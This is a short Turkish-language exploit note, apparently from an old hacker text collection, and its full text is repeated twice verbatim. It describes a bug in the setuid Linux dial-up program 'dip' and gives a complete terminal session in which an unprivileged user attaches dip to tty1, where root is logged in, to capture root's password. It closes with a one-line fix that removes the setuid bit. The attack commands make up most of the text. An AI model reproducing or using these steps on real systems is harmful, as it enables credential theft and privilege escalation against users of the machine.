Sistem : Linux
Komut : /usr/sbin/dip
"dip",Linux ta bulunan
bir Dial-up programi.George Staikos un "dip" te buldugu bug sayesinde
herhangi bir kullanici "/dev" dizininde yetki sahibi olabiliyor.
Örnek :
$ whoami
kaiowas
$ cat < /dev/tty1 <------ root un loginledigi yer
bash: /dev/tty1: Permission denied <------ bunu asabiliriz
$ dip -t
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP> port tty1
DIP> echo on
DIP> term
[ Entering TERMINAL mode. Use CTRL-] to get back ]
rootun_sifresi <------ sansiniz varsa tabii
[ Back to LOCAL mode. ]
DIP> quit
$
Korunma :
chmod u-s /usr/sbin/dip
Komut : /usr/sbin/dip
"dip",Linux ta bulunan
bir Dial-up programi.George Staikos un "dip" te buldugu bug sayesinde
herhangi bir kullanici "/dev" dizininde yetki sahibi olabiliyor.
Örnek :
$ whoami
kaiowas
$ cat < /dev/tty1 <------ root un loginledigi yer
bash: /dev/tty1: Permission denied <------ bunu asabiliriz
$ dip -t
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP> port tty1
DIP> echo on
DIP> term
[ Entering TERMINAL mode. Use CTRL-] to get back ]
rootun_sifresi <------ sansiniz varsa tabii
[ Back to LOCAL mode. ]
DIP> quit
$
Korunma :
chmod u-s /usr/sbin/dip